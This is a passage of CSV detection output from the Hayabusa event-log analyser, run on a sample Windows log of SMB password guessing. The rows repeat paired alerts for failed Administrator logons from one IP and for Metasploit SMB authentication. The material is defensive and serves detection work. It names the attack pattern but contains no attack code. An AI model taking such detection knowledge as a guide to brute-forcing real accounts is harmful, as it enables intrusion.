Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 